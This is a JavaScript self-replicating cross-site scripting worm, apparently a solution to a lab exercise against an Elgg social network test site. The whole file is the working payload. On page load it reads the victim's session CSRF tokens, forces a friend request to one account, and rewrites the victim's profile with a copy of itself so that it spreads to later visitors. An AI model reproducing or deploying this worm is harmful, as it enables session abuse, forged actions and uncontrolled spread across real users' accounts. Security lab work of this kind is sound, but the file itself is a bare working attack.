<script id=worm>
window.onload = function()
{
var headerTag = "<script id=\"worm\" text/javascript\">";
var jsCode = document.getElementById("worm").innerHTML;
var tailTag = "</" + "script>";
var descriptionContent = "Samy is my HERO! added by Aslam, Justice and Yaw" +
encodeURIComponent(headerTag + jsCode + tailTag);
var userName="&name="+elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&_elgg_ts="+elgg.security.token._elgg_ts;
var token="&_elgg_token="+elgg.security.token._elgg_token;
var addFriendURL="http://www.xsslabelgg.com/action/friends/add?friend=47" + ts + token;
var description="&description=" + descriptionContent;
var content=token + ts + userName + description + guid;
var editProfileURL = "http://www.xsslabelgg.com/action/profile/edit";
if(elgg.session.user.guid!=47)
{
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("GET",addFriendURL,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send();
Ajax=new XMLHttpRequest();
Ajax.open("POST",editProfileURL,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>
